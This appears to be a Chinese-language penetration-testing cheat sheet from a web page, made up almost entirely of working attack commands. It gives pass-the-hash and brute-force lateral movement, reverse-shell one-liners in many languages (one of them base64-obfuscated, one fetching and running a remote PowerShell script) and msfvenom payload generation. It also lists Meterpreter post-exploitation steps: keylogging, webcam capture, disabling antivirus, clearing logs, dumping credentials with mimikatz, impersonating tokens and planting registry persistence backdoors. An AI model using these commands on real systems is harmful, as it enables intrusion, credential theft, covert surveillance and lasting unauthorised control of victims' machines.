Cscript //nologo wmiexec.vbs /shell 192.168.202.148 Administrator zxcvbnm123
Wmiexec test/Administrator:[email protected] "whoami"
Wmiexec -hashes :fac5d668099409cb6fa223a32ea493b6 test/[email protected] "whoami"
FOR /F %%i in (ips.txt) do net use \%%i\ipc$ 'password' /user:hacker\administrator
FOR /F %%i in (pass.txt) do net use \192.168.202.148\ipc$ "%%i" /user:test\administrator
FOR /F %%i in (hash.txt) do atexec.exe -hashes :"%%i" test/[email protected] "whoami"
shell for /l %i in (1,1,253) do echo 172.22.13.%i >>tip.txt
shell for /f %i in (tip.txt) do ping -n 1 -w 10 %i | find /i "ttl" >nul && echo %%i >>ok.tx
shell for /f %i in (ok.txt) do dir \%i\c$\users >>result.txt
proxychains4 ./cme smb 10.0.0.1/24 -u administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0 -d xx.org -x "net user"
crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami
cme ldap 10.11.12.211 -u 'username' -p 'password' --kdcHost 10.11.12.211 --users
反弹 Shell
NC
Bash bash -i >& /dev/tcp/172.16.1.130/4444 0>&1
exec 5<>/dev/tcp/172.16.1.130/4444;cat <&5|while read line;do $line >&5 2>&1;done
Perl perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Python python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.41",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");'
Ruby ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Java r = Runtime.getRuntime()
p = r.exec(["/bin/bash" ,"-c" ,"exec 5<>/dev/tcp/10.0.0.1/2002;cat <&5 | while read line; do \$line 2>&5 >&5; done" ] as String[])
p.waitFor()
Lua lua -e "require('socket');require('os');t=socket.tcp();t:connect('10.0.0.1','1234');os.execute('/bin/sh -i <&3 >&3 2>&3');"
Powershell powershell IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/9a3c747bcf535ef82dc4c5c66aac36db47c2afde/Shells/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 172.16.1.130 -port 4444
加密 Shell mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.0.100:2333 > /tmp/s; rm /tmp/s
MSF 大全
安装 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
wget http://downloads.metasploit.com/data/releases/metasploit-latest-linux-x64-installer.run
chmod +x ./metasploit-latest-linux-x64-installer.run
./metasploit-latest-linux-x64-installer.run
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=808 -f elf > shell.elf
msfvenom -p linux/x64/meterpreter/bind_tcp LHOST=127.0.0.1 LPORT=808 -f elf > shell.elf
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=808 -f exe > shell.exe
msfvenom -p osx/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=808 -f macho > shell.macho
msfvenom -p php/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=808 -f raw > shell.php
cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=808 -f asp > shell.asp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=127.0.0.1 LPORT=808 -f raw > shell.jsp
msfvenom -p java/jsp_shell_reverse_tcp LHOST=127.0.0.1 LPORT=808 -f war > shell.war
执行方式:将 shell.php 放在 web 目录下,使用浏览器访问,或者使用以下命令执行:
msfvenom -p cmd/unix/reverse_python LHOST=127.0.0.1 LPORT=808 -f raw > shell.py
msfvenom -p cmd/unix/reverse_bash LHOST=127.0.0.1 LPORT=808 -f raw > shell.sh
msfvenom -p cmd/unix/reverse_perl LHOST=127.0.0.1 LPORT=808 -f raw > shell.pl
执行方式:复制 shell.py 中的内容在 linux 命令行下执行:
python -c "exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zICAgICAgOyAgICBob3N0PSIxOTIuMTY4Ljg4LjEyOCIgICAgICA7ICAgIHBvcnQ9NDQ0NCAgICAgIDsgICAgcz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkgICAgICA7ICAgIHMuY29ubmVjdCgoaG9zdCxwb3J0KSkgICAgICA7ICAgIG9zLmR1cDIocy5maWxlbm8oKSwwKSAgICAgIDsgICAgb3MuZHVwMihzLmZpbGVubygpLDEpICAgICAgOyAgICBvcy5kdXAyKHMuZmlsZW5vKCksMikgICAgICA7ICAgIHA9c3VicHJvY2Vzcy5jYWxsKCIvYmluL2Jhc2giKQ=='.decode('base64'))"
4.shellcode Linux Based Shellcode:
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=808 -f <language>
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=808 -f <language>
msfvenom -p osx/x86/shell_reverse_tcp LHOST=127.0.0.1 LPORT=808 -f <language>
Meterpreter 基本命令 use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
set lPORT 6789
set ExitOnSession false
exploit -j -z
jobs
kill <id >
sessions -l
sessions -i 2
sessions -k 2
如果先获取了 cmd,比如利用 ms17-010,默认使用的 payload 返回的就是 cmd。这时候我们可以使用sessions-u 2来将 cmdshell 升级成 meterpreter。
获取到了 meterpreter,就可以进行后渗透了。
基本系统命令 background
sessions
sessions -i
quit
sysinfo
idletime
reboot/shutdown
shell
irb
getpid
ps
migrate <pid 值>
kill <pid 值>
execute
execute -H -i -f cmd.exe
webcam_list
webcam_chat
webcam_snap
webcam_stream
uictl [enable /disable] [keyboard/mouse/all]
uictl disable mouse
uictl disable keyboard
enumdesktops
getdesktop
screenshot
use espia
run vnc
keyscan_start
keyscan_dump
keyscan_stop
run post/windows/manage/enable_rdp
run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456
run post/windows/manage/enable_rdp FORWARD=true LPORT=6662
run killav
run post/windows/manage/killav
reg –h
upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v lltest_nc -d 'C:\\windows\\system32\\nc.exe -Ldp 443 -e cmd.exe'
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v lltest_nc
nc -v 192.168.81.162 443
clearav
文件系统命令 cat /ls/cd/rm
search -f *pass* -d C:\\windows
getwd/pwd
getlwd/lpwd
upload /tmp/hack.txt C:\\lltest
download c:\\lltest\\lltestpasswd.txt /tmp/
edit c:\\1.txt
mkdir lltest2
rmdir lltest2
lcd /tmp
timestomp C:// -h
timestomp -v C://2.txt
timestomp C://2.txt -f C://1.txt
网络命令 ipconfig/ifconfig
netstat –ano
arp
getproxy
route
portfwd add -l 6666 -p 3389 -r 127.0.0.1
rdesktop -u Administrator -p ichunqiu 127.0.0.1:4444
run autoroute –h
run autoroute -s 192.168.2.0/24
run autoroute –p
run post/multi/manage/autoroute CMD=autoadd
run post/multi/manage/autoroute CMD=print
run arp_scanner -r 192.168.2.0/24
run post/multi/gather/ping_sweep RHOSTS=192.168.2.0/24
run auxiliary/scanner/portscan/tcp RHOSTS=192.168.2.0
use auxiliary/server/socks_proxy
set srvhost 127.0.0.1
set srvport 1080
run
vi /etc/proxychains.conf
proxychains 使用 Socks5 代理访问
use sniffer
sniffer_interfaces
sniffer_start 2
sniffer_stats 2
sniffer_dump 2 /tmp/lltest.pcap
sniffer_stop 2
信息收集 run post/windows/gather/checkvm
run post/linux/gather/checkvm
run post/windows/gather/forensics/enum_drives
run post/windows/gather/enum_applications
run post/windows/gather/dumplinks
run post/windows/gather/enum_ie
run post/windows/gather/enum_chrome
run post/windows/gather/enum_patches
run post/windows/gather/enum_domain
run post/windows/gather/enum_logged_on_users
提权 1.getsystem 提权 getsystem 工作原理:①getsystem 创建一个新的 Windows 服务,设置为 SYSTEM 运行,当它启动时连接到一个命名管道。②getsystem 产生一个进程,它创建一个命名管道并等待来自该服务的连接。③Windows 服务已启动,导致与命名管道建立连接。④该进程接收连接并调用 ImpersonateNamedPipeClient,从而为 SYSTEM 用户创建模拟令牌。然后用新收集的 SYSTEM 模拟令牌产生 cmd.exe,并且我们有一个 SYSTEM 特权进程。
2.bypassuac 用户帐户控制(UAC)是微软在 Windows Vista 以后版本引入的一种安全机制,有助于防止对系统进行未经授权的更改。应用程序和任务可始终在非管理员帐户的安全上下文中运行,除非管理员专门给系统授予管理员级别的访问权限。UAC 可以阻止未经授权的应用程序进行自动安装,并防止无意中更改系统设置。
msf5 auxiliary(server/socks5) > search bypassuac
使用方法类似,运行后返回一个新的会话,需要再次执行 getsystem 获取系统权限 。
无论是 linux 还是 windows 都出过很多高危的漏洞,我们可以利用它们进行权限提升,比如 windows 系统的 ms13-081、ms15-051、ms16-032、ms17-010 等,msf 也集成了这些漏洞的利用模块。
meterpreter > run post/windows/gather/enum_patches
msf5 > use exploit/windows/local/ms13_053_schlamperei
msf5 > set SESSION 2
msf5 > exploit
获取凭证 在内网环境中,一个管理员可能管理多台服务器,他使用的密码有可能相同或者有规律,如果能够得到密码或者 hash,再尝试登录内网其它服务器,可能取得意想不到的效果。
load mimikatz
wdigest
mimikatz_command -f samdump::hashes
mimikatz_command -f sekurlsa::searchPasswords
使用 meterpreter 的 run hashdump 命令:
meterpreter > run hashdump
3.post/windows/gather/smart_hashdump
从上面也可以看出官方推荐post/windows/gather/smart_hashdump。
meterpreter > run post/windows/gather/smart_hashdump
4.powerdump 同 hashdump,但失败了:
meterpreter > run powerdump
假冒令牌 在用户登录 windows 操作系统时,系统都会给用户分配一个令牌 (Token),当用户访问系统资源时都会使用这个令牌进行身份验证,功能类似于网站的 session 或者 cookie。
MSF 提供了一个功能模块可以让我们假冒别人的令牌,实现身份切换,如果目标环境是域环境,刚好域管理员登录过我们已经有权限的终端,那么就可以假冒成域管理员的角色。
use incognito
list_tokens -u
impersonate_token 'NT AUTHORITY\SYSTEM'
或者 impersonate_token NT\ AUTHORITY\\SYSTEM
execute -f cmd.exe -i –t
或者直接 shell
rev2self
steal_token <pid 值>
drop_token
植入后门 Meterpreter 仅仅是在内存中驻留的 Shellcode,只要目标机器重启就会丧失控制权,下面就介绍如何植入后门,维持控制。
原理是在 C:\Users***\AppData\Local\Temp\目录下,上传一个 vbs 脚本,在注册表 HKLM\Software\Microsoft\Windows\CurrentVersion\Run\加入开机启动项,很容易被杀软拦截,官方不推荐 。
run persistence –h
run persistence -X -i 5 -p 4444 -r 192.168.81.160
能实现同样功能的脚本还有:exploit/windows/local/persistence
在 C:\Users**\AppData\Local\Temp\目录下,上传一个 vbs 脚本 在注册表 HKLM\Software\Microsoft\Windows\CurrentVersion\Run\加入开机启动项。通过服务启动,需要管理员权限,官方不推荐使用,运行失败 。
三个文件上传成功,但服务没有启动起来,失败了。使用-r参数可卸载服务。
此模块将可执行文件上载到远程主机并进行创建持久性。涉及到四个参数
• REXENAME 是拷贝到目标系统中的名字
• EXEPATH 是将要上传的后门在本地的位置
• SESSION 是选择运行此模块的会话
• STARTUP 是启动类型,有 USER、SYSTEM、SERVICE 这三种取值,USER 表示为将在用户登录时启动,SYSTEM 表示将在系统启动时启动 (需要权限),SERVICE 表示将创建一个启动服务项 (需要权限)。
meterpreter > run post/windows/manage/persistence_exe REXENAME=backdoor.exe REXEPATH=/home/ubuntu/shell.exe STARTUP=USER
完整路径为 exploit/windows/local/registry_persistence
和第一种方法类似,此模块将会安装一个 payload 到注册表的启动项中。
meterpreter > background
[*] Backgrounding session 13...
msf5 auxiliary(server/socks5) > use exploit/windows/local/registry_persistence
msf5 exploit(windows/local/registry_persistence) > show options
msf5 exploit(windows/local/registry_persistence) > set SESSION 13
SESSION => 13
msf5 exploit(windows/local/registry_persistence) > run
同类型的还有其他 payload,如 exploit/windows/local/vss_persistence,exploit/windows/local/s4u_persistence。
CS 大全 msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_http
msf exploit(handler) > set lhost 192.168.0.143
msf exploit(handler) > set lport 4444
msf exploit(handler) > exploit
CS 创建一个 windows/foreign/reverse_http 的 Listener
然后选中对应机器,右键->Spawn,选择刚刚创建的监听器。
相关免费在线工具 Keycode 信息 查找任何按下的键的javascript键代码、代码、位置和修饰符。 在线工具,Keycode 信息在线工具,online
Escape 与 Native 编解码 JavaScript 字符串转义/反转义;Java 风格 \uXXXX(Native2Ascii)编码与解码。 在线工具,Escape 与 Native 编解码在线工具,online
JavaScript / HTML 格式化 使用 Prettier 在浏览器内格式化 JavaScript 或 HTML 片段。 在线工具,JavaScript / HTML 格式化在线工具,online
JavaScript 压缩与混淆 Terser 压缩、变量名混淆,或 javascript-obfuscator 高强度混淆(体积会增大)。 在线工具,JavaScript 压缩与混淆在线工具,online
Base64 字符串编码/解码 将字符串编码和解码为其 Base64 格式表示形式即可。 在线工具,Base64 字符串编码/解码在线工具,online
Base64 文件转换器 将字符串、文件或图像转换为其 Base64 表示形式。 在线工具,Base64 文件转换器在线工具,online
